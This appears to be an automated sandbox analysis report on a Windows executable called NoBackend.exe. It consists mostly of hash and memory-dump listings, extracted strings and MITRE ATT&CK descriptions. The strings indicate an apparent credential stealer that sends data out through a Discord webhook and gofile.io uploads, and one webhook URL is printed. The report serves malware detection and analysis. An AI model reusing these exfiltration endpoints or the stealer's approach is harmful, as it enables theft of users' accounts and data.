Instruction ID: 6744c7d15142c40cd92714c6b80624817eebdbd150dc8f0bd5e0e8f12add8000
Opcode Fuzzy Hash: 88cb00fa6c58d913f093fa9be6d062672323468af54287f714da6b7f8a226316
Instruction Fuzzy Hash: 46112BE2E26F480ADA47C73A9451351820B9F96BD1F28D362BC1BB6793EB2590C38140

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B620 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c326b4fa5f3d7e4d263976c13a6528afdb685e610284464ab1f6111404bc97d5
Instruction ID: a8d65d0640ba7f7b87ae2e73f3972dd23c0213d5da2edf9decb696f9b2b3974c
Opcode Fuzzy Hash: c326b4fa5f3d7e4d263976c13a6528afdb685e610284464ab1f6111404bc97d5
Instruction Fuzzy Hash: 34214A36A09F8486DA04DF22F48536AB7A4F74ABC0F158662EE9C47765EF79C191CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B7E0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d659b86d1b5f69565a6d087b0e73e30555d3219d76602035c32dfd6f73e717a5
Instruction ID: ea56931de397c909d78547cd642d1e6825e330ecd655ab853e9792d749247698
Opcode Fuzzy Hash: d659b86d1b5f69565a6d087b0e73e30555d3219d76602035c32dfd6f73e717a5
Instruction Fuzzy Hash: AD214A36A09F84C6DA04EB21F48636A77A4F74ABC0F159662EE9C43765DF39C191CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B700 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6dbb657c315813390558a718cd7df933929e5db7832691e13c70408a25ba2f1
Instruction ID: e6f7c8405bc79b38e50b4d3aab9750bb5a90c61cec7445667ea8a84319f1018d
Opcode Fuzzy Hash: d6dbb657c315813390558a718cd7df933929e5db7832691e13c70408a25ba2f1
Instruction Fuzzy Hash: B5214D3AA09F8485DA04DB21F48536A77A4F78ABC0F158662EE9C43B65DF39C591CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B8C0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e854aefa4678e4ed563c69fd2e25f334a3a45ce628c57db6c029b0937f22ec5
Instruction ID: 260a6f4afacc56a198e9ba80828baa2758c0fe43b0542c20c1f9850db98530c1
Opcode Fuzzy Hash: 7e854aefa4678e4ed563c69fd2e25f334a3a45ce628c57db6c029b0937f22ec5
Instruction Fuzzy Hash: 41213836A09F84C6DA04DF22F48536A77A4F74ABC0F159662EF9C43765EB39C191CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8E20 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dec67702a6a5be157c112f4e15fdffa1f9487f84c792996329ba6e3ba633ba6
Instruction ID: 364f4f9bb01d0ea580cb615a3349610b81a479a3830a6056f306980ef6fa7e37
Opcode Fuzzy Hash: 7dec67702a6a5be157c112f4e15fdffa1f9487f84c792996329ba6e3ba633ba6
Instruction Fuzzy Hash: E8E0EC76714E44C4D6205B29E8413967324E788BB8F580322EFBC0B7E4CE38D2A28F44

Uniqueness

Uniqueness Score: -1.00%

Function 00BB70C0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: add2abafcb4146d6b3ab4b47b78e5b02f3c4558f5cddcd9a11fa14574915ef67
Instruction ID: f5828503ec1e360e4f415c31fea58be6b55b6ab291236fd050f9a99252d9ad09
Opcode Fuzzy Hash: add2abafcb4146d6b3ab4b47b78e5b02f3c4558f5cddcd9a11fa14574915ef67
Instruction Fuzzy Hash: 2FC08CB090BB869AFB108300A9413E039C1DB88380DC0C0C28258406149AEC82C04114

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 4x nop then cmp rdx, rbx	0_2_00B5B360
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 4x nop then lock or byte ptr [rdx], r8L	0_2_00B70460
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 4x nop then shr rdi, 0Dh	0_2_00B7AB00
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 4x nop then cmp rdx, 40h	0_2_00B6FD20
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 4x nop then shr r10, 0Dh	0_2_00B7BF80

Source: Joe Sandbox View	IP Address: 162.159.136.232 162.159.136.232
Source: Joe Sandbox View	IP Address: 31.14.70.245 31.14.70.245

Source: NoBackend.exe	String found in binary or memory: https://%s.go%s/uploadFileinvalid
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: NoBackend.exe	String found in binary or memory: https://api.gapple.pw/cors/profile/2006-01-02T15:04:05.999999999Z07:00177635683940025046467781066894
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C0000AA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://apiv2.gofile.io
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C0000EC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://apiv2.gofile.io/getServer
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C0000B2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://apiv2.gofile.io/getServerGet
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C0000B2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://apiv2.gofile.io/getServeraldi/User
Source: NoBackend.exe	String found in binary or memory: https://apiv2.gokian
Source: NoBackend.exe	String found in binary or memory: https://cdn.discordapp.com/avatars/%s/%s.gifhttps://cdn.discordapp.com/avatars/%s/%s.pngmult128bitPo
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: NoBackend.exe	String found in binary or memory: https://discord.com/api/v6/users/
Source: NoBackend.exe	String found in binary or memory: https://discord.com/api/v8/guilds/%s/i
Source: NoBackend.exe	String found in binary or memory: https://discord.com/api/v8/users/
Source: NoBackend.exe	String found in binary or memory: https://discord.com/api/v9/users/
Source: NoBackend.exe	String found in binary or memory: https://discord.com/api/webhooks/1172270413225660506/VdkSArCf5XQSdMw_8XT8p0tZufBvp2m7IFjyTK4cbnGOObP
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: NoBackend.exe	String found in binary or memory: https://goCreateFile/dev/stdin12207031256103515625ParseFloatcomplex128t.Kind
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C000102000.00000004.00001000.00020000.00000000.sdmp, NoBackend.exe, 00000000.00000002.2076962939.000000C000480000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/
Source: NoBackend.exe, 00000000.00000002.2076774521.000000C00040E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/6uo6Pz
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C000114000.00000004.00001000.00020000.00000000.sdmp, NoBackend.exe, 00000000.00000002.2073335904.000000C00015A000.00000004.00001000.00020000.00000000.sdmp, NoBackend.exe, 00000000.00000002.2073335904.000000C000102000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/6uo6Pz)
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C00010C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/d/6uo6Pzeveldb
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C000092000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/uploadFiles
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C000092000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gofile.io/uploadFilesapiv2.gofile.ioQ
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C0000AA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gofile.iok
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C0000AA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gofile.iokapiv2.gofile.io:443apiv2.gofile.io:443tcpapiv2.gofile.iohttps://apiv2.gofile.ioloo
Source: NoBackend.exe, 00000000.00000002.2076962939.000000C000480000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://i.ibb.co/hVY5sGg/logo.png
Source: NoBackend.exe	String found in binary or memory: https://i.ibb.co/hVY5sGg/logo.png/Google/Chrome
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C0000B2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFile/
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C0000B2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io/uploadFile/store4.gofile.io
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: NoBackend.exe	String found in binary or memory: https://youtu.be/dQw4w9WgXcQfailed

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

